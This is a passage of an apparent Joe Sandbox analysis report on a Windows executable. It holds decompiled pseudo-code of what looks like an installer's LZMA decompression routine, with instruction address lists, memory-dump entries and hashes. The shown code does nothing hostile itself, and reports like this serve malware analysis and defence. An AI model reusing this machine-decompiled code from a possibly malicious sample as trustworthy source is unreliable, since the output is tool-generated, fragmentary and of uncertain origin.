                                                                                                                                                                                                                            										 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                                                            										0x800 = 0x800 - __ecx;
                                                                                                                                                                                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                                            										 *__esi = __dx;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            										L111:
                                                                                                                                                                                                                            										_t368 = __ebp - 0x48;
                                                                                                                                                                                                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                                                            										__eflags =  *_t368;
                                                                                                                                                                                                                            										goto L112;
                                                                                                                                                                                                                            									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                                                                                                                            0x004070bf
                                                                                                                                                                                                                            0x004070c5
                                                                                                                                                                                                                            0x004070c8
                                                                                                                                                                                                                            0x004070cc
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070d3
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x004075e5
                                                                                                                                                                                                                            0x004075ed
                                                                                                                                                                                                                            0x004075f4
                                                                                                                                                                                                                            0x004075f6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075f6
                                                                                                                                                                                                                            0x004070d9
                                                                                                                                                                                                                            0x004070dc
                                                                                                                                                                                                                            0x004070e2
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e7
                                                                                                                                                                                                                            0x004070ea
                                                                                                                                                                                                                            0x004070ed
                                                                                                                                                                                                                            0x004070f0
                                                                                                                                                                                                                            0x004070f3
                                                                                                                                                                                                                            0x004070f6
                                                                                                                                                                                                                            0x004070f7
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070fc
                                                                                                                                                                                                                            0x004070ff
                                                                                                                                                                                                                            0x00407102
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407108
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x00406be3
                                                                                                                                                                                                                            0x00406be3
                                                                                                                                                                                                                            0x00406bec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bfd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c06
                                                                                                                                                                                                                            0x00406c09
                                                                                                                                                                                                                            0x00406c0c
                                                                                                                                                                                                                            0x00406c10
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c16
                                                                                                                                                                                                                            0x00406c19
                                                                                                                                                                                                                            0x00406c1b
                                                                                                                                                                                                                            0x00406c1c
                                                                                                                                                                                                                            0x00406c1f
                                                                                                                                                                                                                            0x00406c21
                                                                                                                                                                                                                            0x00406c22
                                                                                                                                                                                                                            0x00406c24
                                                                                                                                                                                                                            0x00406c27
                                                                                                                                                                                                                            0x00406c2c
                                                                                                                                                                                                                            0x00406c31
                                                                                                                                                                                                                            0x00406c3a
                                                                                                                                                                                                                            0x00406c4d
                                                                                                                                                                                                                            0x00406c50
                                                                                                                                                                                                                            0x00406c5c
                                                                                                                                                                                                                            0x00406c84
                                                                                                                                                                                                                            0x00406c86
                                                                                                                                                                                                                            0x00406c94
                                                                                                                                                                                                                            0x00406c94
                                                                                                                                                                                                                            0x00406c98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c8b
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c62
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c70
                                                                                                                                                                                                                            0x00406c78
                                                                                                                                                                                                                            0x00406c7b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406ca2
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00406cab
                                                                                                                                                                                                                            0x00406cbb
                                                                                                                                                                                                                            0x00406cbe
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc4
                                                                                                                                                                                                                            0x00406cc8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406cca
                                                                                                                                                                                                                            0x00406cd0
                                                                                                                                                                                                                            0x00406cfa
                                                                                                                                                                                                                            0x00406d00
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00407151
                                                                                                                                                                                                                            0x00407154
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407157
                                                                                                                                                                                                                            0x0040715a
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x00407160
                                                                                                                                                                                                                            0x00407163
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407207
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x0040720d
                                                                                                                                                                                                                            0x00407210
                                                                                                                                                                                                                            0x00407213
                                                                                                                                                                                                                            0x00407217
                                                                                                                                                                                                                            0x0040721a
                                                                                                                                                                                                                            0x00407220
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407225
                                                                                                                                                                                                                            0x00407228
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406dfc
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00406e02
                                                                                                                                                                                                                            0x00406e05
                                                                                                                                                                                                                            0x00406e08
                                                                                                                                                                                                                            0x00406e0c
                                                                                                                                                                                                                            0x00406e0f
                                                                                                                                                                                                                            0x00406e15
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e1a
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e20
                                                                                                                                                                                                                            0x00406e23
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e29
                                                                                                                                                                                                                            0x00406e2f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e39
                                                                                                                                                                                                                            0x00406e3c
                                                                                                                                                                                                                            0x00406e3f
                                                                                                                                                                                                                            0x00406e42
                                                                                                                                                                                                                            0x00406e45
                                                                                                                                                                                                                            0x00406e46
                                                                                                                                                                                                                            0x00406e49
                                                                                                                                                                                                                            0x00406e4b
                                                                                                                                                                                                                            0x00406e51
                                                                                                                                                                                                                            0x00406e54
                                                                                                                                                                                                                            0x00406e57
                                                                                                                                                                                                                            0x00406e5a
                                                                                                                                                                                                                            0x00406e5d
                                                                                                                                                                                                                            0x00406e60
                                                                                                                                                                                                                            0x00406e63
                                                                                                                                                                                                                            0x00406e7f
                                                                                                                                                                                                                            0x00406e82
                                                                                                                                                                                                                            0x00406e85
                                                                                                                                                                                                                            0x00406e88
                                                                                                                                                                                                                            0x00406e8f
                                                                                                                                                                                                                            0x00406e93
                                                                                                                                                                                                                            0x00406e95
                                                                                                                                                                                                                            0x00406e99
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e69
                                                                                                                                                                                                                            0x00406e71
                                                                                                                                                                                                                            0x00406e76
                                                                                                                                                                                                                            0x00406e78
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e9c
                                                                                                                                                                                                                            0x00406ea3
                                                                                                                                                                                                                            0x00406ea6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb5
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00406ebb
                                                                                                                                                                                                                            0x00406ebe
                                                                                                                                                                                                                            0x00406ec1
                                                                                                                                                                                                                            0x00406ec5
                                                                                                                                                                                                                            0x00406ec8
                                                                                                                                                                                                                            0x00406ece
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed3
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406edc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040717d
                                                                                                                                                                                                                            0x0040717f
                                                                                                                                                                                                                            0x00407186
                                                                                                                                                                                                                            0x00407187
                                                                                                                                                                                                                            0x00407189
                                                                                                                                                                                                                            0x0040718c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407194
                                                                                                                                                                                                                            0x00407197
                                                                                                                                                                                                                            0x0040719a
                                                                                                                                                                                                                            0x0040719c
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719f
                                                                                                                                                                                                                            0x004071a2
                                                                                                                                                                                                                            0x004071a9
                                                                                                                                                                                                                            0x004071ac
                                                                                                                                                                                                                            0x004071ba
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407493
                                                                                                                                                                                                                            0x0040749a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x004074a3
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x004074a9
                                                                                                                                                                                                                            0x004074ac
                                                                                                                                                                                                                            0x004074af
                                                                                                                                                                                                                            0x004074b3
                                                                                                                                                                                                                            0x004074b6
                                                                                                                                                                                                                            0x004074bc
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074c1
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074cb
                                                                                                                                                                                                                            0x0040752b
                                                                                                                                                                                                                            0x0040752e
                                                                                                                                                                                                                            0x00407533
                                                                                                                                                                                                                            0x00407534
                                                                                                                                                                                                                            0x00407536
                                                                                                                                                                                                                            0x00407538
                                                                                                                                                                                                                            0x0040753b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040753b
                                                                                                                                                                                                                            0x004074cd
                                                                                                                                                                                                                            0x004074d3
                                                                                                                                                                                                                            0x004074d6
                                                                                                                                                                                                                            0x004074d9
                                                                                                                                                                                                                            0x004074dc
                                                                                                                                                                                                                            0x004074df
                                                                                                                                                                                                                            0x004074e2
                                                                                                                                                                                                                            0x004074e5
                                                                                                                                                                                                                            0x004074e8
                                                                                                                                                                                                                            0x004074eb
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x0040751d
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407379
                                                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                                                            0x0040737f
                                                                                                                                                                                                                            0x00407382
                                                                                                                                                                                                                            0x00407385
                                                                                                                                                                                                                            0x00407389
                                                                                                                                                                                                                            0x0040738b
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                                                                                                                                            • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00406BB0(void* __ecx) {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                            				unsigned int _v20;
                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                                                                            				signed int _v95;
                                                                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                                                                            				intOrPtr _v124;
                                                                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                                                                            				void _v140;
                                                                                                                                                                                                                            				void* _v148;
                                                                                                                                                                                                                            				signed int _t537;
                                                                                                                                                                                                                            				signed int _t538;
                                                                                                                                                                                                                            				signed int _t572;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t572 = 0x22;
                                                                                                                                                                                                                            				_v148 = __ecx;
                                                                                                                                                                                                                            				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                                                                                                                                                            				if(_v52 == 0xffffffff) {
                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                            					_t537 = _v140;
                                                                                                                                                                                                                            					if(_t537 > 0x1c) {
                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                                                                                                                                                                                            						case 0:
                                                                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                                                                            								goto L173;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                                                                            							_v116 = _v116 + 1;
                                                                                                                                                                                                                            							_t537 =  *_v116;
                                                                                                                                                                                                                            							__eflags = _t537 - 0xe1;
                                                                                                                                                                                                                            							if(_t537 > 0xe1) {
                                                                                                                                                                                                                            								goto L174;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t542 = _t537 & 0x000000ff;
                                                                                                                                                                                                                            							_push(0x2d);
                                                                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                                                                            							_pop(_t576);
                                                                                                                                                                                                                            							_push(9);
                                                                                                                                                                                                                            							_pop(_t577);
                                                                                                                                                                                                                            							_t622 = _t542 / _t576;
                                                                                                                                                                                                                            							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                                                                            							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                                                                                                                                                            							_v64 = _t617;
                                                                                                                                                                                                                            							_v32 = (1 << _t622) - 1;
                                                                                                                                                                                                                            							_v28 = (1 << _t544 / _t577) - 1;
                                                                                                                                                                                                                            							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                                                                                                                                                            							__eflags = 0x600 - _v124;
                                                                                                                                                                                                                            							if(0x600 == _v124) {
                                                                                                                                                                                                                            								L12:
                                                                                                                                                                                                                            								__eflags = _t625;
                                                                                                                                                                                                                            								if(_t625 == 0) {
                                                                                                                                                                                                                            									L14:
                                                                                                                                                                                                                            									_v76 = _v76 & 0x00000000;
                                                                                                                                                                                                                            									_v68 = _v68 & 0x00000000;
                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L13;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                            									L13:
                                                                                                                                                                                                                            									_t625 = _t625 - 1;
                                                                                                                                                                                                                            									__eflags = _t625;
                                                                                                                                                                                                                            									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                                                                                                                                                            								} while (_t625 != 0);
                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _v8;
                                                                                                                                                                                                                            							if(_v8 != 0) {
                                                                                                                                                                                                                            								GlobalFree(_v8);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                                            							__eflags = _t537;
                                                                                                                                                                                                                            							_v8 = _t537;
                                                                                                                                                                                                                            							if(_t537 == 0) {
                                                                                                                                                                                                                            								goto L174;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v124 = 0x600;
                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 1:
                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                                                                            								_v140 = 1;
                                                                                                                                                                                                                            								goto L173;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                                                                            							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                                                                                                                                                            							_v116 = _v116 + 1;
                                                                                                                                                                                                                            							_t50 =  &_v76;
                                                                                                                                                                                                                            							 *_t50 = _v76 + 1;
                                                                                                                                                                                                                            							__eflags =  *_t50;
                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                            							__eflags = _v76 - 4;
                                                                                                                                                                                                                            							if(_v76 < 4) {
                                                                                                                                                                                                                            								goto L15;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t550 = _v68;
                                                                                                                                                                                                                            							__eflags = _t550 - _v120;
                                                                                                                                                                                                                            							if(_t550 == _v120) {
                                                                                                                                                                                                                            								L22:
                                                                                                                                                                                                                            								_v76 = 5;
                                                                                                                                                                                                                            								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                                                                                                                                                            								goto L25;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _v12;
                                                                                                                                                                                                                            							_v120 = _t550;
                                                                                                                                                                                                                            							if(_v12 != 0) {
                                                                                                                                                                                                                            								GlobalFree(_v12);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                                                                                                                                                            							__eflags = _t537;
                                                                                                                                                                                                                            							_v12 = _t537;
                                                                                                                                                                                                                            							if(_t537 == 0) {
                                                                                                                                                                                                                            								goto L174;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L22;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 2:
                                                                                                                                                                                                                            							L26:
                                                                                                                                                                                                                            							_t557 = _v100 & _v32;
                                                                                                                                                                                                                            							_v136 = 6;
                                                                                                                                                                                                                            							_v80 = _t557;
                                                                                                                                                                                                                            							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                                                                                                                                                            							goto L135;
                                                                                                                                                                                                                            						case 3:
